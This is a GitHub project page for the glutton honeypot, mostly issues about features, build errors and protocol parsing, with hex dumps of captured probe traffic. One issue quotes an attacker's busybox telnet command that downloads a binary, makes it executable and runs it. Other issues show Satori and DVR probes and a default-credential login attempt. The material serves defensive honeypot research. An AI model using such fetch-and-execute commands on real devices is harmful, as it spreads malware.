mushorg / glutton Goto Github PK

View Code? Open in Web Editor NEW

227.0 227.0 56.0 498 KB

Generic Low Interaction Honeypot

License: MIT License

Go 98.74% Makefile 0.69% Dockerfile 0.57%

hacktoberfest honeypot

glutton's People

Contributors

Stargazers

Watchers

Forkers

furusiyya martypal2005 secsecsec synchroack gento cacalote hashcode55 0x7fff9 kung-foo nassimabedi niko150 pavervier houcy nikofil dpisano mhils team-firebugs roostergere akpotter bemre a6bs75 4n6strider cstayyab t3chn0m4g3 reanimat0r xianlimei jazenayla orf53975 m00tiny rafaelcalleja phantsure srafi1 akalankahewawasam modulexcite lubyruffy 5l1v3r1 grindfuzz niva8 hecg119 r2d2sw pollockt lufuhu verovaleros codyprime 0x4d31 thehappydinoa simonwaldherr maikroservice dkumiszhan freemarketsoftware haniljain ma5onic

glutton's Issues

Configure Ports

Add support for a config file to whitelist and blacklist ports to handle/listen on.
It's going to be interesting if we can drop the connection in Glutton in a way that it looks like nothing is listening on that port.
Purpose is if you want to only listen on certain ports to make Glutton less obvious.

Asterisk Manager Interface

See here: http://the-asterisk-book.com/1.6/asterisk-manager-api.html
Example

DEBU[3273] [freki   ] new connection xxx:38244->5038 
DEBU[3273] [contable] registering xxx:38244->5038 
INFO[3281] [log.tcp ] xxx
00000000  41 63 74 69 6f 6e 3a 20  4c 6f 67 69 6e 0d 0a 55  |Action: Login..U|
00000010  73 65 72 6e 61 6d 65 3a  20 61 64 6d 69 6e 0d 0a  |sername: admin..|
00000020  53 65 63 72 65 74 3a 20  6d 61 6e 61 67 65 72 0d  |Secret: manager.|
00000030  0a 45 76 65 6e 74 73 3a  20 6f 66 66 0d 0a 0d 0a  |.Events: off....|

too many open files

I'm still having this issues:
[user.tcp] accept tcp [::]:5000: accept4: too many open files

Investigate structured logging

https://github.com/uber-go/zap

Issue with freki

I tried to run the server.go from /app/server.go but getting error in freki package.

I had installed freki using command:
go get github.com/kung-foo/freki

Also tried:
go install golang.org/x/net/context

But same error while running

root@debian8template:/opt/go/src/github.com# go run /opt/go/src/github.com/mushorg/glutton/app/server.go 
kung-foo/freki/freki.go:4:2: cannot find package "context" in any of:
	/usr/lib/go/src/pkg/context (from $GOROOT)
	/opt/go/src/context (from $GOPATH)

Am I doing something wrong here ?

Fix the travis test

Connection timeout value are not configurable

Connection timeout values are hard coded in code:
conn.SetDeadline(time.Now().Add(45 * time.Second))
Expose it as a flag or configuration file attribute so that user can customize.

BrickerBot

Has anyone seen events that look like those described here? https://security.radware.com/ddos-threats-attacks/brickerbot-pdos-permanent-denial-of-service/

Jabber support

DEBU[0177] [freki   ] new connection x.130:14898->5269
DEBU[0177] [contable] registering x.130:14898->5269
INFO[0178] [log.tcp ]
00000000  3c 3f 78 6d 6c 20 76 65  72 73 69 6f 6e 3d 27 31  |<?xml version='1|
00000010  2e 30 27 3f 3e 3c 73 74  72 65 61 6d 3a 73 74 72  |.0'?><stream:str|
00000020  65 61 6d 20 78 6d 6c 6e  73 3a 73 74 72 65 61 6d  |eam xmlns:stream|
00000030  3d 27 68 74 74 70 3a 2f  2f 65 74 68 65 72 78 2e  |='http://etherx.|
00000040  6a 61 62 62 65 72 2e 6f  72 67 2f 73 74 72 65 61  |jabber.org/strea|
00000050  6d 73 27 20 78 6d 6c 6e  73 3d 27 6a 61 62 62 65  |ms' xmlns='jabbe|
00000060  72 3a 63 6c 69 65 6e 74  27 20 78 6d 6c 3a 6c 61  |r:client' xml:la|
00000070  6e 67 3d 27 65 6e 2d 55  53 27 20 74 6f 3d 27 2e  |ng='en-US' to='.|
00000080  27 20 76 65 72 73 69 6f  6e 3d 27 31 2e 30 27 3e  |' version='1.0'>

Fix the readme

Readme needs an update after we changed the core to Freki.

Log Path

This is rather confusing and conflicting with the default value of the parameter: https://github.com/mushorg/glutton/blob/master/logger.go#L11

No ports.yml found

There is no ports.yml source files.

cp $GOPATH/src/github.com/mushorg/glutton/config/ports.yml /etc/glutton

root@debian8template:/# cp $GOPATH/src/github.com/mushorg/glutton/config/ports.yml /etc/glutton
cp: cannot stat ‘/opt/go/src/github.com/mushorg/glutton/config/ports.yml’: No such file or directory

glide install fails ... Cannot detect VCS

I done previous steps in new readme. But glide install is failing for me tried changing VM but same result.

root@beta2:~/gowork/src/github.com/mushorg/glutton# glide install
[INFO]	Downloading dependencies. Please wait...
[INFO]	--> Found desired version locally github.com/1lann/go-sip 68e86c65407ef8cf672ae38526e7f3d29944b94f!
[INFO]	--> Found desired version locally github.com/coreos/go-iptables 5463fbac3bcc6b990663941c2e12660d19f6b36d!
[INFO]	--> Found desired version locally github.com/docker/distribution fb0bebc4b64e3881cc52a2478d749845ed76d2a8!
[INFO]	--> Found desired version locally github.com/docker/engine-api 4290f40c056686fcaa5c9caf02eac1dde9315adf!
[INFO]	--> Found desired version locally github.com/docker/go-connections 9670439d95da2651d9dfc7acc5d2ed92d3f25ee6!
[INFO]	--> Found desired version locally github.com/docker/go-units 0dadbb0345b35ec7ef35e228dabb8de89a65bf52!
[INFO]	--> Found desired version locally github.com/google/gopacket b83f94714c36e30ce851be1d5a0a5226f9f1bca4!
[INFO]	--> Found desired version locally github.com/kung-foo/freki b6a126f46f7b0ce15cdc1d50df8d3626377ff7a7!
[INFO]	--> Found desired version locally github.com/Microsoft/go-winio fff283ad5116362ca252298cfc9b95828956d85d!
[INFO]	--> Found desired version locally github.com/opencontainers/go-digest aa2ec055abd10d26d539eb630a92241b781ce4bc!
[INFO]	--> Found desired version locally github.com/pkg/errors 645ef00459ed84a119197bfb8d8205042c6df63d!
[INFO]	--> Found desired version locally github.com/satori/go.uuid b061729afc07e77a8aa4fad0a2fd840958f1942a!
[INFO]	--> Found desired version locally github.com/sirupsen/logrus d26492970760ca5d33129d2d799e34be5c4782eb!
[INFO]	--> Found desired version locally github.com/Sirupsen/logrus d26492970760ca5d33129d2d799e34be5c4782eb!
[INFO]	--> Found desired version locally gopkg.in/yaml.v2 a5b47d31c556af34a302ce5d659e6fea44d90de0!
[INFO]	--> Fetching golang.org/x/net
[INFO]	--> Fetching golang.org/x/sys
[WARN]	Unable to checkout golang.org/x/sys
[ERROR]	Update failed for golang.org/x/sys: Cannot detect VCS
[WARN]	Unable to checkout golang.org/x/net
[ERROR]	Update failed for golang.org/x/net: Cannot detect VCS
[ERROR]	Failed to install: Cannot detect VCS
Cannot detect VCS

Fix error logging to be less noisy for port scans

Deployed latest glutton on a Digital Ocean droplet (no docker) and ran basic nmap scan (all TCP ports). Would expect to see the results as all ports open, but some ports did not respond and many "use of closed network connection" errors were logged:

[email protected]:~$ nmap g.g.g.g

Starting Nmap 6.40 ( http://nmap.org ) at 2017-11-17 04:46 GMT
Nmap scan report for g.g.g.g
Host is up (0.18s latency).
PORT      STATE    SERVICE
1/tcp     open     tcpmux
3/tcp     open     compressnet
4/tcp     open     unknown
6/tcp     open     unknown
7/tcp     open     echo
9/tcp     open     discard
13/tcp    open     daytime
17/tcp    open     qotd
19/tcp    open     chargen
20/tcp    open     ftp-data
21/tcp    open     ftp
22/tcp    open     ssh
23/tcp    open     telnet
24/tcp    open     priv-mail
25/tcp    open     smtp
26/tcp    open     rsftp
30/tcp    open     unknown
...

Logs:

2017/11/17 04:47:17 ERROR user.tcp: close tcp g.g.g.g:5000->n.n.n.n:40613: use of closed network connection
2017/11/17 04:47:17 ERROR user.tcp: close tcp g.g.g.g:5000->n.n.n.n:50191: use of closed network connection
2017/11/17 04:47:17 ERROR user.tcp: close tcp g.g.g.g:5000->n.n.n.n:56103: use of closed network connection
2017/11/17 04:47:17 ERROR user.tcp: close tcp g.g.g.g:5000->n.n.n.n:56748: use of closed network connection
2017/11/17 04:47:17 ERROR user.tcp: close tcp g.g.g.g:5000->n.n.n.n:35219: use of closed network connection
2017/11/17 04:47:17 ERROR user.tcp: close tcp g.g.g.g:5000->n.n.n.n:37463: use of closed network connection
2017/11/17 04:47:17 ERROR user.tcp: close tcp g.g.g.g:5000->n.n.n.n:50858: use of closed network connection
2017/11/17 04:47:17 ERROR user.tcp: close tcp g.g.g.g:5000->n.n.n.n:41272: use of closed network connection

[glutton ] open rules/rules.yaml: no such file or directory

I am trying to compile the code. It gives no error in build command but when I run the server file it gives the following error
[glutton ] open rules/rules.yaml: no such file or directory

Invisible Glutton crash/panic

I'm running Glutton directly on my server. Every 1-2 days the server becomes unreachable. I assume Glutton crashed and didn't clean up the iptables rules, locking me out from the machine. I have to reboot the box in order to access it again. I tail stderr to a file to see if there is any output, so far without luck. I assume we never execute https://github.com/kung-foo/freki/blob/master/freki.go#L245 on a panic.

Add Docker build check to Travis

Currently the Travis tests do not check if the docker image builds successfully. There are two ways that I can see this going. The first is to build the docker image and then run the unit test on it too and the other is to just build the docker image.

Spawn containers for attackers

Similar to this: https://github.com/dutchcoders/troje

Analyze collected data using Yara

This seems handy: https://github.com/hillu/go-yara

Create a docker container

~~Create a Dockerfile~~
Configure Travis to build and test the container
Push successful builds to the docker Hub

The container should be as minimal as possible. I guess either Alpine or even smaller.

mitm ssh connections

This looks interesting: https://github.com/dutchcoders/sshproxy

Default handler

I'd like to have a handler that I can assign to ports:

ports:
  21:
    default

Default handler should accept the connection and read the package payload. This might trigger additional packages.

Parse MCTP

DEBU[0648] [freki ] new connection 47.X.X.X:56695->9000
DEBU[0648] [contable] registering 47.X.X.X:56695->9000
DEBU[0648] [glutton ] new connection: 47.X.X.X:56695 -> 9000

00000000  52 45 4d 4f 54 45 20 48  49 5f 53 52 44 4b 5f 44  |REMOTE HI_SRDK_D|
00000010  45 56 5f 47 65 74 48 64  64 49 6e 66 6f 20 4d 43  |EV_GetHddInfo MC|
00000020  54 50 2f 31 2e 30 0d 0a  43 53 65 71 3a 31 37 33  |TP/1.0..CSeq:173|
00000030  0d 0a 41 63 63 65 70 74  3a 74 65 78 74 2f 48 44  |..Accept:text/HD|
00000040  50 0d 0a 43 6f 6e 74 65  6e 74 2d 54 79 70 65 3a  |P..Content-Type:|
00000050  74 65 78 74 2f 48 44 50  0d 0a 46 75 6e 63 2d 56  |text/HDP..Func-V|
00000060  65 72 73 69 6f 6e 3a 30  78 31 30 0d 0a 43 6f 6e  |ersion:0x10..Con|
00000070  74 65 6e 74 2d 4c 65 6e  67 74 68 3a 31 35 0d 0a  |tent-Length:15..|
00000080  0d 0a 53 65 67 6d 65 6e  74 2d 4e 75 6d 3a 30 0d  |..Segment-Num:0.|
00000090  0a                                                |.|

Glutton will not start when you pass interface perimeter

When you try and start Glutton right now with a interface perimeter it through's the following error:

  _____ _       _   _
 / ____| |     | | | |
| |  __| |_   _| |_| |_ ___  _ __
| | |_ | | | | | __| __/ _ \| '_ \
| |__| | | |_| | |_| || (_) | | | |
 \_____|_|\__,_|\__|\__\___/|_| |_|

	
panic: interface conversion: interface is string, not bool

goroutine 1 [running]:
panic(0x980a40, 0xc42138cc00)
	/usr/local/go/src/runtime/panic.go:500 +0x1a1
github.com/mushorg/glutton.New(0xc421375c20, 0x0, 0x0, 0x0)
	/go/src/github.com/mushorg/glutton/glutton.go:42 +0x2b5
main.main()
	/go/src/github.com/mushorg/glutton/app/server.go:56 +0x19b

From what I have been able to tell this might have started in PR #91.

Investigate usage of nDPI for protocol detection

https://github.com/ntop/nDPI

Mitm HTTPS connections

Add support for mitm https connections, like: https://github.com/malfunkt/hyperfox

update documentation to reflect switch to dep

Logging paths #2

https://github.com/mushorg/glutton/blob/master/logger.go#L15-L16 spot the issue. Maybe add some testing for the logger and log file paths?

Parse iSCSI

On port 3260

00000000  03 81 00 00 00 00 00 5f  40 00 01 37 00 00 00 00  |[email protected]....|
00000010  00 00 00 01 00 01 00 00  00 00 00 01 00 00 00 01  |................|
00000020  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000030  49 6e 69 74 69 61 74 6f  72 4e 61 6d 65 3d 69 71  |InitiatorName=iq|
00000040  6e 2e 31 39 39 31 2d 30  35 2e 63 6f 6d 2e 6d 69  |n.1991-05.com.mi|
00000050  63 72 6f 73 6f 66 74 3a  6e 6d 61 70 5f 69 73 63  |crosoft:nmap_isc|
00000060  73 69 5f 70 72 6f 62 65  00 53 65 73 73 69 6f 6e  |si_probe.Session|
00000070  54 79 70 65 3d 44 69 73  63 6f 76 65 72 79 00 41  |Type=Discovery.A|
00000080  75 74 68 4d 65 74 68 6f  64 3d 4e 6f 6e 65 00 00  |uthMethod=None..|

Get the original destination port

Investigate if we get enough information from /proc/net/nf_conntrack or /proc/net/ip_conntrack

make build error

Hi all,

Has anyone encountered this compilation issue with the 'make build' command for the latest commits?
I am trying to compile Glutton on ubuntu 16.04.

test@test:/opt/go/src/github.com/mushorg/glutton$ sudo make clean
rm -rf bin/
test@test:/opt/go/src/github.com/mushorg/glutton$ sudo make build
go build -o $GOPATH/bin/server app/server.go
// # command-line-arguments
app/server.go:75: too many arguments in call to glutton.New
app/server.go:77: gtn.Start undefined (type *glutton.Glutton has no field or method Start)
Makefile:6: recipe for target 'build' failed
make: *** [build] Error 2
test@test:/opt/go/src/github.com/mushorg/glutton$ go version
go version go1.7.1 linux/amd64
test@test:/opt/go/src/github.com/mushorg/glutton$

Any idea to solve this? Thanks!

Log the payload

We want to store the traffic/payload of the requests. We should consider pcap.
http://www.devdungeon.com/content/packet-capture-injection-and-analysis-gopacket

Add cli for management

Cli provides very easy way to register, order and categorize commands, optional flags required to run a command line application. Source of input can also be a json or toml. We can register init and exit code for our application. It provides context that travels to all handler functions of application, so flags can be accessed and set at any level of application with the help of context. Context can be used to track and shutdown goroutines.

Support for DICOM parsing

See DICOM: https://en.wikipedia.org/wiki/DICOM
Sample request:

00000000  01 00 00 00 01 00 00 01  00 00 41 4e 59 2d 53 43  |..........ANY-SC|
00000010  50 20 20 20 20 20 20 20  20 20 46 49 4e 44 53 43  |P         FINDSC|
00000020  55 20 20 20 20 20 20 20  20 20 00 00 00 00 00 00  |U         ......|
00000030  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000040  00 00 00 00 00 00 00 00  00 00 10 00 00 15 31 2e  |..............1.|
00000050  32 2e 38 34 30 2e 31 30  30 30 38 2e 33 2e 31 2e  |2.840.10008.3.1.|
00000060  31 2e 31 20 00 00 61 01  00 ff 00 30 00 00 16 31  |1.1 ..a....0...1|
00000070  2e 32 2e 38 34 30 2e 31  30 30 30 38 2e 35 2e 31  |.2.840.10008.5.1|
00000080  2e 34 2e 33 31 40 00 00  13 31 2e 32 2e 38 34 30  |[email protected]|
00000090  2e 31 30 30 30 38 2e 31  2e 32 2e 31 40 00 00 13  |.10008.1.2.1@...|
000000a0  31 2e 32 2e 38 34 30 2e  31 30 30 30 38 2e 31 2e  |1.2.840.10008.1.|
000000b0  32 2e 32 40 00 00 11 31  2e 32 2e 38 34 30 2e 31  |[email protected]|
000000c0  30 30 30 38 2e 31 2e 32  50 00 00 3a 51 00 00 04  |0008.1.2P..:Q...|
000000d0  00 00 40 00 52 00 00 1b  31 2e 32 2e 32 37 36 2e  |[email protected].|
000000e0  30 2e 37 32 33 30 30 31  30 2e 33 2e 30 2e 33 2e  |0.7230010.3.0.3.|
000000f0  36 2e 30 55 00 00 0f 4f  46 46 49 53 5f 44 43 4d  |6.0U...OFFIS_DCM|
00000100  54 4b 5f 33 36 30                                 |TK_360|
``

stdout connection info

Right now the package is dropped if there is no proxy configured for that port. I'd like to see at least a message with the remote IP address and the target port. Are we logging those connection attempts? If not, we should also have a log entry with the same information.

Update README with IPTABLES information

How to redirect all traffic to the port we are listening on.
How to set the sshd port to a different port.
How to except the sshd port from the redirect so we can connect to the machine.

Drop privileges if started as root

If Glutton is started as root, we should drop privileges to the nobody user.

Track number of TCP/UDP connections

Track the number of open connections, how many we drop, how many the client drops, etc.
Use https://golang.org/pkg/net/#TCPListener.SetDeadline to drop connections that time out. Here is a related SO discussion: https://stackoverflow.com/questions/12741386/how-to-know-tcp-connection-is-closed-in-golang-net-package

satori

INFO[20219] [telnet  ] recv: "/bin/busybox satori\x00\r\n" 
INFO[20220] [telnet  ] send: "> "

Seeing lots of those and no further stage. Ideas?

runtime error

I have this error many times.

2017/11/28 18:31:16 DEBUG [freki ] new TCP connection x.x.x.x:x->22
2017/11/28 18:31:16 DEBUG [contable] registering x.x.x.x:x->22
2017/11/28 18:31:16 ERROR [user.tcp] panic: runtime error: invalid memory address or nil pointer dereference
2017/11/28 18:31:16 ERROR [user.tcp] stacktrace:
goroutine 21245 [running]:
runtime/debug.Stack(0xc42000e3f0, 0xa89c2a, 0x15)
/usr/local/go/src/runtime/debug/stack.go:24 +0x79
github.com/mushorg/glutton/vendor/github.com/kung-foo/freki.(*UserConnServer).Start.func1.1(0xfc1960, 0xc42000e5f8)
/x/x/x/x/src/github.com/mushorg/glutton/vendor/github.com/kung-foo/freki/userconnhandler_tcp.go:66 +0xda
panic(0x9c4ee0, 0xfa6f90)
/usr/local/go/src/runtime/panic.go:489 +0x2cf
github.com/mushorg/glutton.(*sshProxy).handle(0x0, 0xfbd5c0, 0xc422b9bc80, 0xfc1960, 0xc42000e5f8, 0x0, 0x0)
/x/x/x/x/src/github.com/mushorg/glutton/proxy_ssh.go:131 +0xb2
github.com/mushorg/glutton.(*Glutton).mapProtocolHandlers.func9(0xfbd5c0, 0xc422b9bc80, 0xfc1960, 0xc42000e5f8, 0xc42141e808, 0x0)
/x/x/x/x/src/github.com/mushorg/glutton/protocols.go:51 +0x56
github.com/mushorg/glutton.(*Glutton).registerHandlers.func1(0xfc1960, 0xc42000e5f8, 0xc422b9b950, 0xc42000e5f8, 0x0)
/x/x/x/x/src/github.com/mushorg/glutton/glutton.go:214 +0x3d3
github.com/mushorg/glutton/vendor/github.com/kung-foo/freki.(*UserConnServer).Start.func1(0xfc1960, 0xc42000e5f8, 0xc421430300, 0xc422b9b950, 0xc4214302e0)
/x/x/x/x/src/github.com/mushorg/glutton/vendor/github.com/kung-foo/freki/userconnhandler_tcp.go:70 +0x7c
created by github.com/mushorg/glutton/vendor/github.com/kung-foo/freki.(*UserConnServer).Start
/x/x/x/x/src/github.com/mushorg/glutton/vendor/github.com/kung-foo/freki/userconnhandler_tcp.go:74 +0x32c

too many open files

Glutton eventually fails with:

[user.tcp] accept tcp [::]:5000: accept4: too many open files

runtime error: invalid memory address or nil pointer dereference

I ran glutton and tried to connect from localhost telnet it crashed showing following error
My VM is having OS - Debian GNU/Linux 8

root@debian8template:~# go run /opt/go/src/github.com/mushorg/glutton/app/server.go  -log /tmp/glutton.log

  _____ _       _   _
 / ____| |     | | | |
| |  __| |_   _| |_| |_ ___  _ __
| | |_ | | | | | __| __/ _ \| '_ \
| |__| | | |_| | |_| || (_) | | | |
 \_____|_|\__,_|\__|\__\___/|_| |_|

	
INFO[0000] [glutton ] Loading rules from: /etc/glutton/rules.yaml 
INFO[0000] [glutton ] Rules: [Rule: tcp dst port 5001 Rule: tcp dst port 23 or port 2323 or port 23231 Rule: tcp] 
INFO[0000] [freki   ] starting freki on [x.x.x.55]  
INFO[0000] [freki   ] starting proxy.tcp on 6000        
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x0 pc=0x404c50]

goroutine 27 [running]:
panic(0x753ac0, 0xc4200120b0)
	/usr/local/go/src/runtime/panic.go:500 +0x1a1
main.main.func3.1(0xc4212e4c80, 0xc421305580, 0xc42131ce80, 0xc42133ef40, 0xbb3440, 0xc420024000)
	/opt/go/src/github.com/mushorg/glutton/app/server.go:161 +0x200
created by main.main.func3
	/opt/go/src/github.com/mushorg/glutton/app/server.go:194 +0x14c
exit status 2

Tarpit

Add capability to add a delay to responses. Delay should be random in range. Global or per port and transport layer.

Dissect using libwireshark

Create a PCAP, pass it to TShark (https://www.wireshark.org/docs/man-pages/tshark.html) for dissection and use the protocol info to pick the right handler.

fgrep XDVR (cctv/dvr)

@gento I see a bunch of those lately:
fgrep XDVR /mnt/mtd/dep2.sh\x00
after that there is no additional step. I assume they expect a specific response payload.

Fetch samples by telnet

read /bin/busybox telnet x.x.x.x 6745 > test; /bin/busybox chmod 777 test ; ./test

Add honeytrap service banners

Honeytrap has a couple of service banners we could use to get to the next stages for connections requiring a banner.
Can be found here: https://github.com/armedpot/honeytrap/tree/master/etc/responses

Proxy Handler

Add a handler able to proxy a request to a local or remote service. For example redirecting ssh requests to a Kippo instance.
A yaml configuration file that has a PORT->IP:PORT mapping. When you get a connection, get the data,
create a TCP client, send it to the proxy target, fetch the response and send it back to the attacker

Parse Java Debug Wire Protocol (JDWP)

DEBU[1386] [freki ] new connection 188.X.X.X:47651->5005
DEBU[1386] [contable] registering 188.X.X.X:47651->5005
DEBU[1386] [glutton ] new connection: 188.X.X.X:47651 -> 5005

00000000  4a 44 57 50 2d 48 61 6e  64 73 68 61 6b 65        |JDWP-Handshake|

Change freki to 1.1.0

This means no more listener but passing handlers to freki.